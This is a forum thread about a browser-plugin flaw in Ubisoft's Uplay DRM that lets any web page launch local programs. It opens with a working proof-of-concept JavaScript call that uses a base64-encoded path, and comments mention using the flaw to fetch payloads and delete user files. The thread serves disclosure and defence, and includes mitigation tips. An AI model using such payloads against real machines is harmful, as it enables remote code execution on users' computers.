Ubisoft "Uplay" DRM exposed as rootkit
If you play one of the games below try clicking on this link (tested with Assassin's Creed on Win7 and FireFox).
http://pastehtml.com/view/c6gxl1a79.html
var x = document.createElement('OBJECT');
x.setAttribute("type", "application/x-uplaypc");
document.body.appendChild(x);
x.open("-orbit_product_id 1 -orbit_exe_path QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play")
Ubisoft installs a backdoor that allows any website to take over your computer. The Sony BMG rootkit was also DRM and required product recall when it was discovered.http://en.wikipedia.org/wiki/Ubisoft#Games
Assassin's Creed II
Assassin's Creed: Brotherhood
Assassin's Creed: Project Legacy
Assassin's Creed Revelations
Assassin's Creed III
Beowulf: The Game
Brothers in Arms: Furious 4
Call of Juarez: The Cartel
Driver: San Francisco
Heroes of Might and Magic VI
Just Dance 3
Prince of Persia: The Forgotten Sands
Pure Football
R.U.S.E.
Shaun White Skateboarding
Silent Hunter 5: Battle of the Atlantic
The Settlers 7: Paths to a Kingdom
Tom Clancy's H.A.W.X. 2
Tom Clancy's Ghost Recon: Future Soldier
Tom Clancy's Splinter Cell: Conviction
Your Shape: Fitness Evolved
147 comments
[ 3.6 ms ] story [ 209 ms ] threadSince when exactly does Firefox allow ActiveX components?
As-is, he just seems like a raging hacker who loves attention and doesn't care if thousands of unsuspecting users get their credit card details stolen by malware authors. I must be misunderstanding something, yeah?
That being said, installing a "sudo" plugin in everybody's browser without any security validation (if I understand correctly what this is about) would be hilarious if it wasn't that tragic. But gamers are gamers, they forgave sony, they'll forgive ubisoft too, and they'll never learn.
The question is: do you believe the perpetrator to be malicious or dumb?
...where at last he installed his Russian Rootkit.
Or maybe some programmer added a feature that was insecure and they moved on to work on some bug that was crashing level three?
I was saying it seems more likely to me that any random developer making a stupid mistake like this seems more likely than a company having real motivation to create this kind of security hole.
I suppose, alternatively, this could have been an individual developer's intent. An exploit like this would get a pretty penny on the exploit market, I'd think.
the only way you can say its stupidity at this point is if they are MASSIVELY retarded at ALL levels, thus malice, is simpler.
fuck i hate people like you, you are the ones that ask for sources on shit you can google.
Instead, they ask for their interns to build the "solution" that makes my computer part of the Borg.
I really don't feel compassion in this case towards the company (towards the users is a different story, no doubt)
Companies are often incompetant with security code. If you are expecting high quality secure code with consumer level software, you will often be disappointed.
I can launch Steam games from my browser without any plugins.
https://developer.valvesoftware.com/wiki/Steam_browser_proto...
If the vendor tries to delay you for months or ignores you, sure. But it doesn't even seem like he tested the exploit here to understand whether it was a serious threat.
Also, that's probably the quickest way to get them to release a fix.
http://en.wikipedia.org/wiki/Full_disclosure
As for your "raging hacker who ...," dig, consider the idea that malware authors already knew about the vulnerability and have been using it.
Do you have any evidence that is the case? The original post didn't mention it.
Otherwise it just sounds like excusing irresponsible disclosure.
http://www.theregister.co.uk/2010/07/22/microsoft_coordinate...
Many believe it is irresponsible to delay informing users that they have a major backdoor exposing them.
Ref: http://pc.gamespy.com/articles/122/1225585p1.html
Here's taviso's mail on seclists: http://seclists.org/fulldisclosure/2012/Jul/375
I hope ubisoft reacts quickly.
Next time I want to play an Ubisoft game I'm just going to pirate it.
EDIT: I buy 99% of my video games through Steam, and when the games I get through Steam want to use their own launcher (play, windows live games, or EA's Origin, for example) I always get peeved.. to find out it allows arbitrary remote code execution is absolutely infuriating.
EDIT: Oh, btw, I'm using Opera 12.
EDIT: Protect yourself (in Opera, at least) by going to Settings -> Preferences(menu option) -> Advanced(Tab) -> Downloads(left menu bar) -> Search for "uplay" and delete the associated row.
Then of course you have to wait for the damn thing to sign in every time you want to play the game "Connection failed, do you want to retry?"
Meaning: I feel your pain, brother.
On the other hand, the Batman: Arkham Noun games [2,3] list SecuROM in 3rd party DRM but not GFWL. I'm told that these games are both GFWL titles.
I don't know what's going on there, but it looks inconsistent.
[1] http://store.steampowered.com/app/97100/
[2] http://store.steampowered.com/app/35140/
[3] http://store.steampowered.com/app/57400/
Perhaps it is not listed if it is only used to enable "social gaming" but DRM is done by some other software.
> Online play requires log-in to Games For Windows – Live
So I guess it's in the DRM list if you need it to play singleplayer, and in system reqs if you don't. Seems fair, but I'd still rather have it be consistent. No reason S8 couldn't list it in both spots.
Which is why I say it's usually a crap shoot. :(
EDIT: In terms of Tom Clancy's Ghost Recon Future Soldier specifically, it doesn't mention Uplay anywhere on the Steam store page at all. It's like "surprise! This 3rd party launcher / DRM / rootkit comes with it, absolutely free!"
Not only did it fail to log me in the first time and totally dropped my first hour of gameplay, but I ended up having to reset a password and spend over half an hour trying to get Arkham City and GFWL live to work together.
I lost over 1.5 hours of time to that bullshit, and a pirate would have lost 0 hours.
I am ONCE AGAIN bitten in the ass for being a legitimate customer instead of a dirty pirate.
Proponants of the walled garden 'App Store' model point out how it's good for users, since it's more secure. Well, is this a case for that? Will the closed app store model step up to the plate now?
Or is the walled garden no better for users, but much better for the sellers of software?
Honestly, about 1 in every 2-3 games I play I find myself wondering why I didn't just pirate it to begin with. When your software has the kind of extra "features" that make your user base actually consider downloading a cracked, illegal copy after buying the real deal, you know you've royally fucked up somewhere along the way.
There's no shortage of good games to play, and I'm just not going to give my money to companies that abuse their customers like Ubisoft does.
Hey Ubisoft, because I hope someone there is reading this thread: When your DRM is so bad that it makes people who would otherwise buy your games want to pirate them, you have utterly, totally, and completely failed. Pass that on to your boss please.
Edit: Protect yourself in Chrome by going to about:plugins and just turning it off.
http://xkcd.com/488/
Another good reason to pirate Ubisoft's games is that none of them work when Uplay is down. Uplay is down a lot more often than never.
Edit: Other comments suggest there's a NPAPI plugin as well so it's definitely intended for use on the web.
Also in what sense is this a rootkit? Is this purposely hidden from the list of IE addons or something?
AFAIK Sony never installed backdoors, and I thought they were the worst of the DRM crowd.
Sorta. Tis roughly the similar overtones of 'people-who-take-it-are-bad' (i.e. everyone who isn't a straight cis male), however it's not as graphic and not as tied to the actual imagery of receptive sex as the previous example.
Since you are the curator and sole arbiter of allowable phrases
What? No I'm not. Who said I was? Not me. Just because I call someone on something doesn't mean I'm the sole arbiter of things. How many articles on this site will lambaste some technology? Lots. Do we reply with "Shut up! you're not the sole arbiter of programming languages"? No that's not what happens here. One should talk about the merits of the complaint, rather than try some little deflection tactic.
I was not deflecting, that was my way of talking about the merits of the complaint, to whit, what you object to might be a tiny subset of someone else's objections, in which case who gets to decide? By telling that person not to use that terminology, you are saying you get to decide.
I think we've also seen plenty of people who think they are the sole arbiter of programming languages, and they get called out on it.
No, the word "use" means lots of things. To give you an idea, lots of people are OK with people saying "use" in polite, professional contexts, or day time TV, but lots of people would not be OK with "fuck" or "fisting with two hands" in professional contexts. There is a difference between them. If you cannot tell the difference, people might get annoyed at you in many situations.
we should stop using it lest we offend
It is a common retort from people who want to continue to say things that marginalise some minorities to claim that "It's polticial correctness gone mad!" or "you can't say anything anymore!". You've just done that, you're trying to imply that I would have a problem with the word "use" to further your strawman argument that "You can't say anything anymore lest you offend!". No-one's suggesting that there's anything wrong with "use". But there is something wrong with calling anyone who anal bad, or anyone who might engage in receptive sex (i.e. all non-straight-cis-males) bad.
I, for one, take exception that your category of people who enjoy receptive sex seems to be explicitly excluding straight males, such that you've used the exact same "i.e." qualifier twice. It is well within the realm of possibility that a straight male would ask his partner to stimulate his prostate during sex, but you categorically reject that. Are you going to correct your mistake and stop making generalizations? Maybe start using e.g. from now on?
My position is this; it is obvious that the original poster is not making some kind of blanket statement that all people who participate in anal sex are bad, but rather is stating that having a large object in your anus is uncomfortable and having an entity do it to you while you are unwilling is horrible. It's not a statement that was attempting to marginalize minority groups. You are the one who misconstrued it to mean all gay men are evil. Maybe that's why you find people's objections to your attempted control over the English language to be common.
Finally, you seem to be annoyed that I "created a strawman argument" out of you, but you do feel free to contort my statements into "it's political correctness gone mad!", and "you can't say anything anymore!" as well as directly stating that I am someone who "wants to continue to say things that marginalize some minorities". Is ad hominem less of a logical fallacy than making a so-called strawman argument? I'm not going to continue arguing with someone that has such intellectual dishonesty because it's just a waste of time. I am done here and I won't be reading any responses you post, so you can save yourself some time there.
No, the word "use" means lots of things. To give you an idea, lots of people are OK with people saying "use" in polite, professional contexts, or day time TV, but lots of people would not be OK with "fuck" or "fisting with two hands" in professional contexts. There is a difference between them. If you cannot tell the difference, people might get annoyed at you in many situations.
we should stop using it lest we offend
It is a common retort from people who want to continue to say things that marginalise some minorities to claim that "It's polticial correctness gone mad!" or "you can't say anything anymore!". You've just done that, you're trying to imply that I would have a problem with the word "use" to further your strawman argument that "You can't say anything anymore lest you offend!". No-one's suggesting that there's anything wrong with "use". But there is something wrong with calling anyone who anal bad, or anyone who might engage in receptive sex (i.e. all non-straight-cis-males) bad.
This is just inexperienced developers («it's "encrypted" using base64 - we're fine!!») that had a "great idea" (= launch games from an embedded IE control) that has, kinda, backfired.
The sad thing is that it would be trivial (I'm using the word "trivial" here are I have implemented something like this just last friday in 3 hours) to add a signature to that command line and only execute signed command lines - I mean, these Games require an internet connection anyways, so there's nothing stopping them from serving the launcher from somewhere in the web and have a private key there to do the signing.
[1] http://en.wikipedia.org/wiki/Ring_(computer_security) [2] http://en.wikipedia.org/wiki/Rootkit
Well yes, it allows "offline" privileges to essentially any online site (if you can launch arbitrary executables, you can download and execute arbitrary payloads). And considering there is still a rather prevalent culture of running Windows as an administrator account (if only because some softs fail rather annoyingly and without trying to escalate when launched without adminstrator priviledges) for all intents and purposes it gives pretty wide control of the machine to any URL you connect to.
I am in no way trying to say that this can not be dangerous, but it's different from what we would usually call rootkits.
For instance, the remove-item commandlet, its description goes like this "The Remove-Item cmdlet does exactly what the name implies: it enables you to get rid of things once and for all. Tired of the file C:\Scripts\Test.txt? Then delete it"[1]. No UAC prompt. Bingo, let's start erasing this annoying C:\Users\Username\Documents.
And this is only one example, give me 1 hour and I can find several ways to fuck up your computer with a powershell open :-).
[1] http://technet.microsoft.com/library/ee176938.aspx
You say that as though it's some kind of hurdle.
C:\>ftp -h
Transfers files to and from a computer running an FTP server service (sometimes called a daemon). Ftp can be used interactively.
FTP [-v] [-d] [-i] [-n] [-g] [-s:filename] [-a] [-w:windowsize] [-A] [host]
Battlefield 3 also installs it's plugin ("ESN Launch Mozilla Plugin") in all browsers on a pc. It's capable of running EA's Origin service, so does it present the same threat?
Vindictus/Mabinogi Heroes
Dragon Nest
Maplestory
Atlantica Online
Combat Arms
I also have titles that use online login from Ubi such as ANNO 2070 installed.
I think the list of affected titles is far smaller than listed.
How and when is this associate set? Has someone identified which application in the installer performs it? Is it a particular UPlay version?
I don't doubt they are setting this up to allow them to run games from a browser. EA does it with Origin, Valve does it with Steam, as well as numerous other applications.
I don't doubt its existence but I think people are starting a wildfire without enough facts. I can't even seem to research this because it's not on my machine.
It is better to live without having played these games, than to expose myself to such security risks.